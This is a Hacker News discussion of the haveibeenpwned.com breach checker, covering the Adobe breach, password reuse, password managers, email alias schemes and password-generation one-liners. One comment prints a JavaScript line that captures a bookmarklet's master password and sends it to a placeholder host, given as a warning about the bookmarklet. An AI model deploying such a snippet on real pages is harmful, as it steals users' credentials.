Hacker News new | comments | show | ask | jobs | submit login
Have I been pwned? Check if your email has been compromised in a data breach (haveibeenpwned.com)
491 points by mountaineer 1101 days ago | hide | past | web | 283 comments | favorite

Shit. Looks like I got caught up in the adobe breach. Let this be a lesson to all engineers in charge of such situations to implement strong security. You are partially responsible for these disasters.

I got a call from PayPal a week or two ago. It turns out somebody in Indonesia accessed my Paypal account, presumably with credentials scraped from adobe. I know, I know, shame on me for reusing passwords. Luckily no damage was done and I did a change to the strongest password I've assigned anything yet.

Great job, op (if you're the one who wrote this service) for such an amazing tool. Everyone, if you haven't already, you really should check if you've been compromised. I will be sending this to all my friends.

This should be a lesson not to manage your own passwords, use a password manager there are many to choose from. I was also caught up in the Adobe breach but my password was randomly generated by my password manager.

I am surprised by how few people are aware of this: https://www.pwdhash.com/

Convenience provided via Chrome/Firefox extensions, portability provided by the website.

I second this. I've been using it for a few years now. It gives me great peace of mind knowing that my password on a site like HN is something like "e5wLoMB1kZ". I only have to remember a few passwords and yet each site has a unique password.

Even in the event a leak of plain-text passwords I'm still secure in knowing that my other accounts won't be compromised unless there is a very determined attacker.

However, you do have to put some trust in the extension and the website. Fortunately, the website has some good credentials and the extensions have appeared clean... for now.

Yeah, I did not hear about pwdhash and it sounds like a nice idea.

One thing I have noticed though is that when one enters the same site password, you get the same "Hashed" password back to use. Yes, there is an extra step involved here so that buys you some security but I will be cautious in reusing site passwords.

Imagine an attack where for the top 100 sites in the world, all of the most commonly used passwords are used to generate the "Hashed" (pwdhash) passwords for each site and compile that info into a big list. This can then be added to the candidate list of password that can be tried in cracking leaked hashes.

The take way here is that even though pwdhash gives you domain-specific generated passwords, you will make to sure that you use a different site password as input to pwdhash for each site.

There is also http://supergenpass.com, which uses a JavaScript bookmarklet to do the hashing.

That is an extremely bad idea. Any site you use can put the following JavaScript in their site to obtain your master password next time you use the bookmarklet:

document.documentElement.addEventListener("DOMSubtreeModified", function() {$("#gp2_master").change(function() {location.href = "http://example.org/leak/" + $("#gp2_master").val()})})

You can use an enigmapass or a few of the other browser extensions to avoid this. Also there are iphone and android apps.

I like https://oneshallpass.com/ better since it lets you change some attributes about the passwords generated. So if a site is compromised you can just increment the generation field and get a totally new hash.

Is it protecting from the possibility of web sites being compromised with your data by trusting the website and the extension? How is it better?

It's a start, but you'd need all the mobile platforms on it too.

Eh, that's awesome. There's an Android app, too, so I can use this on my phone.

They don't seem to mention anywhere which hashing algorithm they use. Also, the lengths are quite small. Any idea why?

pwdhash uses a weak hashing mechanism, making it possible to brute-force master passwords. It is OK to use, but make sure that you have a cryptographically strong master password.

I generate passwords with something like:

printf "/" ; openssl rand -base64 32 | sed 's/.$//'

The leading slash was a nice tip someone gave me to not echo if you accidentally paste the password into IRC... Though if the password itself contains a slash then your client won't consider it a command and will echo it anyway, so do what you will.

Anyway, each new account gets a new password you couldn't beat out of me, though you could probably get my password safe phrase, so do what you will.

Generating long passwords like this highlights providers who enforce password length limits. Paypal's limit is ludicrously short. Hetzner's is limited too.

edit more guff.

Crap, looks like my wife's email was caught up in the Adobe breach. I think she created an account for reading ebooks with Adobe DRM downloaded from our library.

Consider this a heads up for married HN'ers, you should check their emails too.

In Australia, both my wife and I got mailed out letters from Adobe regarding our accounts being potentially compromised. Did that happen elsewhere as well?

I got an email but assumed it was a phishing attempt until I read that they were actually doing this.

Got the same one -- USA

What do you do when you are using a different computer and need to login to site?

I use a yubikey that outputs half of the password used to unlock my keypass database, the other half is in my head (so even if they steal my yubi they can't do much). The database is backed on my own owncloud which is hosted on my own vps and replicated on other 3-4 servers (all mine). My little personal cloud setup.

Call me paranoid but it took me half an hour to set it up and the monthly fees for the servers are very very low.

" … hosted on my own vps … "

Might want to think through whether that really counts as "your own". Who's got hypervisor access to the hardware? Any keys or passphrases that ever hit the disk or memory on someone else's hardware should (at least at some levels of paranoia) be considered "possibly compromised".

(I store "sensitive stuff" on AWS/DigitalOcean/other-vps-providers, but only if it's first encrypted locally and the key/passphrase never gets used/stored on the vps. EncFS works pretty well dealing with that for me... I do, though, "trust" 1Passwords datafile encryption enough to take advantage of the iOS/MacOSX sync features they've implemented over Dropbox. That's possibly not achoice I'd make i I thought I were a target of someone like the NSA.)

For some logins, the answer is "Sorry Dave, I can't do that." If I don't have the private cert, or the ssh cert, or the right hole in the firewall - there are many thing I've chosen intentionally to not be able to log in to using someone else's computer.

For lesser security critical logins, I've got my password software (1Password) on my phone (and iPad). For some intermediate level logins, I need my phone or iPad anyway, I've got TOTP two favor auth (using Google's Authenticator app) on a bunch of important stuff (Amazon/AWS, DigitalOcean, Dropbox, Guthub, the email account that all my domain names are registered with and to which password resets go, and a few other things…)

What will you do if your primary computer gets stolen?

Private SSL/TLS certs, ssh keys, and 1Password database are all stored on encrypted fiesystems (EncFS) and synced across four machines (two at work, one at home, and my laptop) using Dropbox (which is another off-site copy, and has revision archives) and/or BTSync. Those four copies are all OS X Time Machine backed up (and revision archived) - and two of those Time Machine backups are rsynced nightly to separate drives in opposite locations - so all up (not couning Dropbox) I've got copies on 10 separate spindles in two physical locations, two of them in a locked filing cabinet (the work time machine and rsync disks).

I've had a "primary computer" stolen before – and I don't intend to ever have that much grief if (when?) it happens again. I'm confident that even if all the electronics from either one of my work or home get stolen, I could be back into fully productive work-mode in half a day and one maxed-out-creditcard at the local Apple store. (If someone hits both my work and home locations simultanously, I suspect I've got bigger problems that whether I'll have angry clients shouting at me before the weekend…)

My first question would be "how often does that really happen?". It's a legitimate concern at first sight, but for me, I pretty much never need to do that since I always have my phone with me.

But if I do need to, I have 1Password on my phone as well and can get the passwords from it.

Presumably you can open your password manager's web service and do it from there.

That or use your phone. Most password managers have apps.

Ok, that makes the most sense to me.

I wouldn't want to use a webservice to look at my passwords. I want to open my password safe locally. Less likely to be snooped upon (though still possible, obviously).

I have the encrypted password file on a usb thumb drive. I remember the master password. I view as fatally flawed any password store that uploads the encrypted password file to a remote server.

If you don't mind paying a small annual fee, Lastpass is a very nice tool for automated password management across devices.

Use a browser add-on for exporting/importing passwords, transfer the exports on an encrypted USB stick.

You can have the password repository in dropbox to sync between different machines, and also use the app

You can. I would not. I don't want my password file uploaded to any remote server.

I don't. I carry my passwords (via 1Password) on my phone, so I'll just use that.


But I would not really be comfortable using it on an unknown computer, unless I had good knowledge that it was properly administered.

I carry a little piece of paper in my wallet that has my private key further encrypted by myself, and that encrypted key is used to decrypt other passwords through a private web/mobile app I made. The top encryption key I have is just some sort of simple algebraic mumbo jumbo formula I used to scramble my private key just a bit, and I change it up once in awhile, and have that written down. What's in my memory is how I jumbled it.

Well until the recent 4.x / 3.x screwup [1] that 1Password did it has been quite useful (and like you, my 16 character password at Adobe, even if guessed, would not be useful anywhere else)

[1] My 3.x was upgraded to 4.x on my Macbook (unbidden) and the only way to restore compatability with my 3.x on iOS is to pony up another $20. Can't go back to 3.x on the Macbook, not particularly happy about the upgrade fee on iOS.

FWIW, I think version 4 is a worthwhile upgrade on iOS, and I see the price at $9.99 at the moment (at least in the US store).

It was quite an astonishing move to break 1Password (mine is still broken) when Apple released their own free product.

  > there are many to choose from
This is the reason I don't use one... I still haven't decided which, even if _any_ is better than nothing.

... Aren't password manager the #1 target for hackers nowadays?

Imagine how much that wallet could be worth... How much bribe does the weakest 1Password engineer need?

Then use a local storage one, like password-safe (Win & Mac. password-gorilla for Linux). Combine that with spideroak, dropbox, google drive or whatever file syncing utility you want.

Anyone know what adobe's password requirements were? I don't know which password I used there: Adobe forced me to change it without letting me test the old one.

For the Adobe breach specifically, you might try the site set up by Last Pass, which checks your email against the breached data: https://lastpass.com/adobe/

The added feature is that, if your email is in the list, Last Pass will share with you how many others had your same password -- and the list of all password hints associated with that password. If more than a handful of others used the same password, that should jog your memory about which you used.

P.S. I'm not associated with Last Pass and actually use a different product. But I found this site very helpful.

This is beautiful. Thank you so much. I'd been getting really frustrated not knowing which passwords I'd needed to change but my hint was enough!

You can just torrent users.tar.gz (the leaked list of encrypted passwords) and then grep the file for your email address, which will give you the encrypted version of your password.

...which does not really help without the crypto-key - even if you know a list of possible passwords you cannot test them.

Well, funnily enough, if you know your password and it was in the leak, you can test it against your own password.

lastpass.com/adobe will show you the list of hints of yourself and other users that used the password.

Wonderful. sarcasm

> Great job, op (if you're the one who wrote this service)

Looks like no.

"Have I been pwned?" is by Troy Hunt http://www.troyhunt.com/

The OP's bio indicates that they are someone else. https://news.ycombinator.com/user?id=mountaineer

I got pwned by adobe too. Luckily password there was one of my "weak" ones, and I do not use it anywhere of importance.

Same here. I used my throw-away email to sign up at Adobe, along with my weak throw-away password. I don't have any Adobe licenses or such. The only Adobe product I use is the Flash plugin.

The email account is on Hotmail and currently has about 54k messages in its in-box, 99.9% unread. I use it to create accounts on news sites and annoying fora and such, always with the same weak password. About the only time I log into is to respond to password confirmation requests generated during account creations.

Originally, the weak password was also my email password. However, a few years ago, the email account got hacked severely, such that MSFT wouldn't let me in until I reset the password. It now has a strong password.

That's not very "lucky," it seems very intentional.

I had a very insecure password on adobe.com. i.e. low-enough entropy that 55 users had the exact same password. I figured since Adobe do not have my credit card number and there is nothing to gain by impersonating me on that site, it did not matter. I have not used the same email/password combination elsewhere, but even if I did it would only be on other low-value accounts. I'm not worried about attackers finding it by association either (they will have it already from dictionary attacks.)

I had something similar happen to one of my Windows Live accounts. Someone somehow broke into it and, although I did not have any credit card information, they decided to continue to use it. They added a stolen credit card to the account. I received an email in japanese from Xbox Live (! I have never owned an Xbox, someone converted my account, nor do I speak japanese) at one point which prompted me to call their support and figure all of this out.

But the point I'm trying to get across is, if I were unlucky that could have turned into a HUGE mess where I was accused of stealing said credit card. Luckily that did not occur (probably because they could trace it to a separate IP address.. and I don't own an Xbox). I no longer use passwords as insecure as I did for that account - I had to deal with this headache while at my family's Christmas party as well (because that is when I received the email), which made it even more irritating.

It was lucky in a sense that if adobe required complex passwords more important password would have been leaked. It was also lucky in a sense that adobe itself got hacked instead of entity that has one of my more sophisticated and thus valuable passwords.

One of my addresses was also in the Adobe breach. No idea what password I used there, but I'm fairly sure it must have been either my common "junk" password, shared with tons of forums, but nothing that poses any serious risk to me (just to those forums). Or if they had stricter requirements, some variation on it that I always forget, so I have to ask them for a new password every time anyway.

I certainly don't reuse financial or email passwords. Or actually I do, but only for financial and email stuff. But I probably shouldn't reuse them at all.

But those forums? I'm just not going to keep track of a new password for every site I visit.

If you're using a forum, outré in front of a computer. Keeping track of things is one of the things computers are _best_ at. Get yourself a password manager. I use 1Password, but I hear good things about KeyPass and LastPass too.

Seriously - you can't manage 2013 grade password complexity requirements for all the places you need passwords in your head any more (it's likely you never could…)

Get a tool to help, computers are wonderful tools.

I've got KeePass, but I haven't used it remotely as long as I've used many websites. Also, I don't have my KeePass DB in Dropbox, so I can't access it from other computers.

More than that, I'd rather not put my KeePass DB on someone else's machine in the first place. But I'll easily trust strange computers with a password for some crappy forum.

There's always something you risk compromising. I prefer some forum account to be compromised.

My wife was on the Adobe list, the same credit card she used at Adobe was charged from Amazon or paypal ( I can't remember which ) couple of weeks after the leak. She called the bank they closed it right away and took the charges off the card.

I woke up this Thanksgiving with a bunch of email notifications from Paypal that my account had been hacked and taken over. I (also shame on me) tend to reuse some of my passwords, and figured someone got into my Paypal account using my adobe credentials, not even being sure if I had created an account with adobe for anything in the past.

I checked my email address on this site and it didn't find any pwnage.

I'm relieved my email address isn't in any of these leaks, but also now concerned about whatever it was that let someone into my paypal account so easily...

If you reuse passwords, separate throw-away accounts (like Adobe or pretty much anything that's not your email, your bank or PayPal), from the important stuff.

Sites that need to be secure, hopefully really are secure. Sites that don't really need to be secure because they don't deal in anything of value, probably don't invest quite as much in security. Reusing passwords across those different kinds of sites means the extra security of the secure sites is wasted.

Of course it's way better not to reuse at all, but remembering two or three passwords is a lot easier than dozens, and still a lot safer than just one.

> Looks like I got caught up in the adobe breach.

I knew I was, but I was delighted by what Dreamhost did: they have cross-checked their users' e-mails with the Adobe leaked database and sent a message [1] to affected users explaining the situation and advising to change the passowrd, reminding to not re-use passwords and suggesting password vaults.

I think it's a great thing to do by third-parties when leaks of this magnitude happen.

[1] Full text: http://pastebin.com/2AkU0v98

Have fun closing your account by the way, I went through that fiasco recently. I regularly run the LastPass security challenge and an old email of mine was in the Adobe breach too.

49 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ARG!

After the Macrumors breach (I had only signed up about 2 weeks before it happened), I decided it was time to make all my passwords unique and to use a credentials manager like 1Password. I too shared the same password for multiple sites/services (shame on me too).

Fuck me. Ditto. The reason I checked? I unknowingly, until today, had a domain name transferred away from me -- or rather, ownership changed, for a domain I bought years ago for $3,000. Email address used for that domain in Adobe breach.

Looks like I was caught in Adobe breach as well. Luckily I use one off passwords for each site I log into. Damn.

Yahoo here. How the hell did the hackers get the passwords in plain text? Were they seriously unencrypted?

They were encrypted, but with no variation between the hashes for per email. https://lastpass.com/adobe/ will show you the password hints associated with the (in my case) 200 people with the same (hashed) password. The clues would be sufficient to guess the password.

I've gone to generating a unique password with a simple random number generator if the end site supports password recovery (in case Chrome's password memorizing system forgets it).

#!/bin/bash if [ $1 ] ; then a=$1 else a=16 fi dd if=/dev/urandom bs=1000 count=1 2>/dev/null | tr -d -c "[:alnum:]" | tr -d '`' | tr -d "'" | tr -d '"' | tr -d '\\' | head -c $a echo

This is not meant as criticism: Is there any particular reason for all the tr pipes? Is there any advantage to using tr instead of base64?

I essentially use the following:

  base64 </dev/urandom | head -c $COUNT | xargs -0

Criticism welcome. Yours is nicer.

I use this for a little more entropy:

    LANG=C tr -dc "[:print:]" < /dev/urandom | fold -w 32 | head -n 1

I much prefer using the program `pwgen`. It's installed on all my Linux boxes and it's available from Cygwin too, and it generates a 'pronounceable' password, which makes it a lot easier to remember and also much easier to copy.

There's also the benefit of fewer moving parts -- with a pipeline like that, I'd be worried about accidentally stripping out some of the randomness. I'm fairly confident that a simple invocation of `pwgen` will work.

Mine showed for Adobe as well, but I don't have an account with Adobe?

It’s a bummer to find my e-mail between the leaked Adobe accounts. Especially after the ordeal I had to go through to have my Adobe account “deleted” months ago:

You have requested that we deactivate your Adobe account. We have sent a request to the relevant team to process your request. Please note that you will lose access to Adobe services and support for which you have registered or paid for. You will not be able to obtain serial numbers for past purchases and the deactivation process may take up to ninety (90) days. Once completed, your adobe.com membership and all personal data will be deleted from our database.

Adobe, every single time I had anything to do with you it sucked. Big time.

It took 120+ days for my ebay account to get deleted, but thankfully I could delete my paypal in only a few weeks.

The 120+ days thing with ebay is allegedly because they need to make sure any outstanding deals are closed and accounts settled.

Of course that is absolute bullshit, it took them 120+ days to close my account and I had not used it for over 4 years at that point. They actually emailed me telling me that they were closing the account due to inactivity. They gave me 3 or 4 months to log on before it would be killed, so I thought to myself "good, saves me the hassle of doing it myself". Fast forward 3-4 months and I get an email telling me my account was compromised. Weird... so I log on, confirm any payment info I had was long since expired, confirmed nothing had happened and that my password was intact... then I scrambled the security question and password just to be safe and told Ebay to delete the account. Cue "this will take 120+ days" bullshit... but whatever.

At nearly the end of that 120+ days I get emailed again telling me the account was compromised. I'm convinced this is a scam they run to trick you into logging into your account, thus resetting the the countdown.

Ebay and paypal are among my least trusted companies. I have a higher opinion of even Comcast or Halliburton.

I think my story pretty much echos yours; I'd stopped using paypal for a couple of years, and stopped using Ebay.

I cancelled and about three months later I was "compromised". At that point I reset the data to random values, deleted my "ebay@example.com" email alias, and just resigned myself to forgetting about it.

Common tactic as far as I can tell, other companies do the same thing. eg: My Blizzard account that I can't sign in to because it's cancelled has somehow been 'compromised' multiple times.

Funny/scary anecdote I experienced a few days ago: most Linux flavors check against the cracklib database when changing passwords, and as I typed in an account password, a brand-new cracklib said it was based on a dictionary word. Now, my passwords are alphanumerical jumble, and they're usually comprised of an alphanumerical jumble "core" that I memorize and then a site-based or computer-based pre- and suffix.

So, let's say for example, my current core is "kgA85kjF3". Then for example, I'd morph that for my Hacker News account to "ZkgA85kjF39!" and my fileserver as "UkgA85kjF3O2". I thought this was a good method of having reasonably long passwords but I'd have to memorize very little per site.

So imagine my surprise, when I created a new password "NkgA85kjF3T3", cracklib found a dictionary word in it. It got worse from there. Through experimentation, I determined that it was indeed the core that was compromised. Any password containing "kgA85kjF3" was compromised.

I have no idea how this happened. If this was not a big cosmic coincidence, if this is not just a random regex filter accident, that means data from at least two known password databases containing my cores has been correlated, and put into cracklib no less. There is really no limit to the imagination regarding what illegitimate databases might contain...

I do something similar, but I then hash the result and use that as the password. That way, if someone gets hold of a couple of passwords, it's harder to derive the "core'.

That's a good procedure, a few weeks ago I'd have deemed you paranoid but obviously there is no practical limit to paranoia anymore ;)

However, the hashing step makes it impractical for me on different devices in certain situations. I don't want to rely on browser extensions or apps either. So I'm changing my passwords to the output of an algorithm I can do in my head now.

For those who aren't aware https://www.pwdhash.com/

Yeah, though I don't use it, since I only found out about it after I had been using my own system for a while.

I do the same, and my "core" is less obscure than yours. I'm worried. What is this cracklib thing? Do I just provide it my password and it tells me stuff?

It's a linux library that checks passwords against a database of known words and patterns. You give it a password and it gives you basically one of two answers: "this is based on a known word" or "nope, never seen anything like it before". The database format looks highly obscure and doesn't lend itself to grepping without much effort.

Is there an easy way to check a password using cracklib via the command line? Preferably on OS X.

It doesn't come with OS X, but I suppose there should be a port available somewhere. Otherwise, Virtualbox and some minimal distro are probably your best bet.

On Linux command line, you just feed the password to it:

  echo "password" | cracklib-check

  brew install cracklib cracklib-words

  echo "lol" | cracklib-check


You can also use an algorithm. I do something like create a 'base' that is used for all sites. And then something like take the number of letters in the url google = 6 and add it the beginning. Then take the second letter from the right and last, 'o' and 'e' and add it to the end. In the end you get 6baseoe. Unique password for each website.

Passphrases are a really good idea, but a lot of sites have very short length limits.

Granted if they have limits thats a really big red flag that they're storing your password in plain text, as a hash should always be the same length, so you probably shouldn't sign up there anyway. I remember a few years ago I was signing up for a TD account, and about 5 pages through the signup page it wouldn't allow me to continue because my password was /too secure/ (not their exact wording, but that was basically the problem). What makes it funnier is a lot of sites would reject the password I used at the time as not being secure enough.

I stopped signing up at that point, but I remember getting a phone call (!) from them a couple days later asking why I didn't finish the sign up, and my answer was: because I'm not giving my money to a company that doesn't know how to store passwords!

In Australia, our "welfare" system is taken care of by Centrelink. They have all of your personal details, as well as access to the amount you're getting per fortnight, and job history, resume etc. Lots of stuff you don't want compromised.

They also limit your password to 8 characters.

This is a huge government website that heaps of Australians have to access at least fortnightly.

One of the benefits of learning to program J for me has been to make it easy to remember hard to crack passwords. I have some passwords which are actually runnable J on-liner programs and contain all kind of '#!$' symbols. All I need to do is remember what they do so that I can recreate them.

I've memorized an algorithm instead of trying to remember passwords. I don't actually remember hardly any of my passwords, instead I use this mini algorithm that I came up with to create unique passwords for each site I go to. Each time I go to a site it just takes me a couple seconds to figure out what the password is. I find it a lot easier to remember that one algorithm rather than trying to remember a bunch of passwords or rotating through the same few passwords.

What I've found is that some sites will either truncate your password without telling you or restrict you to 8-20 chars.

Sometimes sites limit you, my bank for example has an 8 character limit.



That's not the point. The idea is to have different passwords for each site and each device. So in this many-words scheme (which will run afoul of a lot of websites' length restrictions on passwords by the way) I'd have to find a good way to encode the site's name or I'd have to tack on at least four specific words to the existing core sentence. That's not something I'll remember with dozens of sites and devices.

Wow, got downvoted for that. I wouldn't have thought this description of how I do passwords is so controversial.

What's so bad about it?


Not to be a spoilsport, but don't most sites allow spaces in passwords anyway?

Most do but some filter for it. Really varies site to site.

Believe me when I say all your personal information is on SOMEONES computer. Everyones is.

I know. If I wanted my information to be "safe", I wouldn't have an online profile at all. For starters, I wouldn't use Google services. It's a matter of limiting exposure at this point. I know the NSA reads my email and can probably log into my home router, but I don't want everybody else to do the same. Otherwise, let's all change our passwords to "password" and be done with it. Just because protection isn't close to 100% doesn't mean I don't want any at all.

can you tell me more about what you mean? for instance if your wife sends you a nude picture through something like oovoo does that guarantee someone has stolen it?

If you're connected to the world wide web and you send/receive data, there's a strong chance that either:

a) Either sending/receiving machine is broken into

b) Someone or something is intercepting your message

c) The service you are using is broken into

There's just too many holes to plug and too many people with expertise in these domains orders of magnitude above ours that they can use to either be malicious, or help our cause.

Your computer/device needs to be secure. Your other parties devices need to be secure. Your connection needs to be secure. Your third parties service needs to be secure. The internet the third party uses needs to be secure. Their data centre needs to be secure. Then their ISP needs to be secure.

All data is online.

I hope only the crypto-hash of my password is stored.

LastPass has a similar service for some of the recent (and not so recent) hacks:

* https://lastpass.com/adobe/

* https://lastpass.com/linkedin/

* https://lastpass.com/lastfm/

* https://lastpass.com/eharmony/

If you use LastPass, then their security check will run these checks automatically against all leaks and email addresses:


Thanks for that; I had ignored the Adobe leak, because why would I have created an Adobe account? Turns out I did at some point, so I guess I'm the goat there.

Often you need to create an account or somehow register your email at sites, just to get something very basic, like a free download, or use a feedback form.

This demonstrates nicely why that's a bad idea.

http://www.bugmenot.com/ is useful for such a case, registration required for a download.

I entered my address out of curiosity and it told me I had an Adobe account. I can't remember ever creating one so I tried the password reset process. Adobe tells me there doesn't exist an account under that address.

How is this possible? How did Adobe leak my address if I don't even have an account?


The LastPass checker is really nice. Whats scary is that it found a few other people that had the same password as me.

For the Adobe breach, LastPass also emails you a sample of the password hints of others -- its kind of funny how people remember a certain string.

The crazy thing my simple password was used by 5 other people. Luckily my email password is much more complicated.

For those freaking out about somebody "misusing" this information (your e-mail address) .... I have some bad news.

E-mail addresses are not secret. They cross the wire in plaintext, they get stored in various mail server logs in various relays across the globe, they get passed around by spam analysis services, anti-virus services, and any company you submit it to has the right to sell it and any other information about you to anyone they want, without your consent.

"Although partial regulations exist, there is no all-encompassing law regulating the acquisition, storage, or use of personal data in the U.S. In general terms, in the U.S., whoever can be troubled to key in the data, is deemed to own the right to store and use it, even if the data were collected without permission." [1]

California is one of the few (only?) states with privacy laws, and it basically just says companies must post a privacy policy and follow it - and that policy could, for example, say they are allowed to sell on your information, which i'm sure 99% of companies would opt for.

Your e-mail address alone is not worth much in a general sense. In terms of spammers, they already have all the e-mail addresses in this list. And if on the off chance this guy's service is "selling" e-mail addresses to spammers (at what... $0.10 per e-mail address?), are you really so afraid of someone sending you spam?

[1] https://en.wikipedia.org/wiki/Information_privacy_law#United...

For more information about all the other personal information about you that isn't private, see https://epic.org/privacy/profiling/

Hi, two things.

People knowing that you have account yyy@example.com at example.net could use that information in a spear-fishing attack, or know that you're involved in a controversial website, prohibited website, etc.

Emails were not the only things that were stolen. For example, in the Adobe breach, encrypted passwords were stolen. If your email address is shown as being in the Adobe breach, that also means that your encrypted password, password hint, etc. were stolen. For Sony, maybe credit card information.

If this website was only about whether email addresses were leaked, then why would anyone type in their email address into this website (thus leaking your email)?

I'd prefer not to use this site since, if I'm affected, it signals to whoever owns the site that I'm a live person whose accounts might be worth probing.

OTOH, California was the first of many US states to require disclosure or notification of personal information security breaches,


and will soon be requiring disclosure of breaches of "personal information that would permit access to an online or email account"


Normally wouldn't trust this, but:

http://www.troyhunt.com/ http://www.intodns.com/haveibeenpwned.com (forwarded from haveibeenpwned.azurewebsites.net) http://www.whois.com/whois/haveibeenpwned.com

Seems legit.

Troy Hunt has been blogging about this for a while. Troy is a good guy who blogs extensively on security matters. I don't see any risk in putting your details in here.

His recent posts on pwning peoples phones and tablets while they were at his conference talk are pretty amusing. Shows just how insecure things really are.

As someone who was 'pwned' by the Adobe leak, I have no idea how bad the pwnage was. That is, I don't recall what my Adobe password was, and so I have no idea which of my many passwords was compromised.

Also, I partially went through the Adobe password reset procedure two or three times--each time guessing at what my original password was. Unfortunately, they accepted all of my guesses, so I was still none the wiser about which password was compromised.

To top the entire ordeal off, Adobe was not the one to tell me that my password was compromised. Instead, my hosting provider and some other services notified me.

Yeah, I'm downloading the leak and trying to check if I can deduce whether it was the common I-don't-care password I think it was. A couple other people had used the same password, but the hints didn't help me.


> I don't recall what my Adobe password was

This will tell you your password hint (and if any other user had an identical password, you will see their hint also. ) https://lastpass.com/adobe/

Same boat. Don't remember if it's an email/password combo I still use.

I tend to create a new email address for everything I sign up for. This makes a little harder to check :)

EG: twitter@example.com, facebook@example.com, hackernews@example.com

It also makes it a little harder for people to find me on social media. Not sure if that's a bug or a feature ;)

That's actually a very unadvisable scheme. By doing this you make yourself a target. If any one of those are compromised, attackers will attempt to try that against a lot of popular sites (including banks). If you have your own domain (which I assume you do based on your scheme), I suggest not doing this. You would be better off coming up with a random account name for each and using a password manager to keep track of these.

FYI, I used to do this too. And this is how (in a similar fashion) Mat Honan got Gizmodo's Twitter and his iCloud and Gmail accounts hacked and also had his computer remotely wiped because he used his name in every domain/service as his account name or email account name.

Edited for more information.

The key motivation is not security, but if any account starts receiving spam, I will have a good idea where it is coming from. It also lets me shut off mail from any source.

Some services will use that as the username, others allow me to pick my own. Using a password manager helps this whole scheme. Now that I do that, I could go to random email addresses and usernames.

The only problem I've found with this method is the spammers that try to guess your email, so they end up sending emails to "admin@domain.com", "webmaster@domain.com", etc. The catch-all forwards them all to me.

The only way around this, I think, is to only have uncommon emails, like instead of admin@domain.com, use contactadmin@domain.com. Put a block on the common ones and you're good to go.

It's not that spammers try to guess your email, but that if you accept any email address as valid they'll notice that you are accepting delivery.

Once i figured this out i just created wildcard aliases that end with a static prefix: netflix-blah@example.com, adobe-blah@example.com, etc. This cuts down on 99% of the random spam.

regrettably this is against RFC 2142[1], which states that you need to leave certain mailboxes open (such as abuse@domain, webmaster@domain etc)

[1] - http://www.ietf.org/rfc/rfc2142.txt

Quite ironic, isn't it, how "abuse@example.com" is a conduit for abuse?

Spammers effectively killed that RFC.

>By doing this you make yourself a target. If any one of those are compromised, attackers will attempt to try that against a lot of popular sites (including banks).

And if you use the same email for everything (as is the alternative), attackers can attempt to try that against popular sites. So I don't see the downside of this method?

The real key is to not use the same email address across accounts. If you have your own domain, then it's easy.

I actually don't like the idea of using email addresses as user IDs. I believe that was a lazy approach in the first place and this causes too many problems. I'm sure it all started that way because someone wanted your contact info, and since the only way to guarantee a valid email was to make you verify it. It has nothing to do with security.

Nobody said security was easy or convenient.

Anyway, to each his own. I have my own domains and do, unfortunately, have about 100 email addresses/aliases. Yeah, it can be inconvenient to maintain. I originally started using the aliases because I wanted to know who was giving out my email to spammers. I caught a few and stopped doing business with them.

If someone is directly targeting you, then yes it's an issue (but even so, it's less of an issue than using exactly the same email address for all of your accounts).

In a mass compromise like the Adobe one, it's highly unlikely that the hackers are going to go out of their way to attack people who use this method when there's millions of much easier targets already in their list.

Using this approach also makes it a lot easier to spot spam - if I get an email to "hackernews@myaccount.com" claiming to be from my bank, it's highly unlikely to be genuine. If it's coming to "mybank@myaccount.com", there's at least a fair chance that it's real - I still treat it with a fair amount of caution, but as I've filtered out the obvious junk I can spend more time checking out these reasonably genuine-lookuing one. Using a random email like hhj4378@myaccount.com would make this quick filtering a lot harder.

the downside is that using random accounts on your domain requires a catch-all email rules on your server (unless you add each address by hand, but frankly that's too much of a hassle)

I never use a catch-all. Deleting email would quickly exceed available time.

I go through the trouble of creating a new email each time. I've considered writing a script to make it easier, but my current mail provider makes that difficult.

catchall FTW

I follow the following pattern with websites:

If the website is important (ex. government), I use <sitename><4_numbers>@<private_domain>. My filtering rules are extremely strict, and every mail that doesn't come from the expected website gets automatically flagged as spam and deleted. If their DB leaks, I just change the 4 numbers.

If I know the website and it's not an startup, I use <sitename>@<public_domain>, ex. facebook@example.com. My filtering rules only flag the messages as "maybe spam" when the sender is not in my contacts. If their DB leaks, I change the filter from "maybe spam" to "spam".

If it's a website I don't know, or a startup, I use <full_domain>@<publc_domain>, ex. mystartup.io@example.com. I don't filter them, but if I start getting spam, I just simply set the email as an alias to my wormhole (an account I never check that flags anything it receives as spam).

If it's a spam blog, or a website that forces me to create an account by no apparent reason, I just use the wormhole address.

This seems way too difficult to manage.

I wish there was a Gmail like application that anyone could set up easily on its server and that would allow for : quick email generation.

You need to sign up to something ? Generate a quick mail that redirects automatically to your main inbox and that you can give away when signing up.

If you see that spam is arriving on this email, remove it.

baby+hackernews12345@gmail.com Goes to the inbox of user baby

I already know this trick and don't use it because :

* it's easy to get the real email address from it.

* most sign up form don't accept the "+" sign.

That seems like a lot of overhead to manage. Also, you're going to have a bad day if a spam bot decides to spam thousands of <common_user_name>@yourdomain.com. Maybe that's fallen out of practice, but I've seen it happen before.

Not really, in this year I had changed only 1 filter, the initial setup may be cumbersome, but the end result is worth the effort.

And about the spam to random addresses, in 8 years the most extreme problem I had faced is spam to censored addresses like git...@domain.com (thanks google code).

It's a tried and true spamming tradition and it's going strong. I see plenty of entries like

    Envelope-to: <eba615c3c@my.domain> 
in my reject log. Addresses that were never used anywhere. Some things just refuse to die.

This is brilliant, thanks for sharing.

Same here, with completely randomized passwords 60 chars long and different emails. IM INVISIBLE!

60 chars passwords probably reach the char limit imposed by many different services.

Might not want to give away your exact password length publicly.

Considering that's 394 bits of entropy, I think rfnslyr might get away with it.

unless it's >= 60

Don't worry, it was yet another trick.

How many proxies are you behind? :)

Who's to say these guys aren't stealing our emails?

They don't need to steal if you publish your email address yourself wfunction... http://comments.gmane.org/gmane.comp.lang.d.general/86923

I don't appreciate you stalking me and posting that here (just because it's accessible somewhere on the internet doesn't mean I want to make it more public), but as a matter of fact I wasn't talking about that email address in the first place.

your email is not a secret.

No, but it can be harvested for directed attacks or spamming. Entering it would basically 'prove' it's a valid address.

The Adobe leaks list is mostly made up of verified emails, so...

Coming to think of it, there has been some spam lately (though that hasn't happened in years now at gmail), and I wonder whether it's related to that Adobe leak.

Ah, but by checking if your email is compromised, they get even more emails then they did just from compromised sources.

On a risk / reward basis the benefit to checking here is actually pretty high.

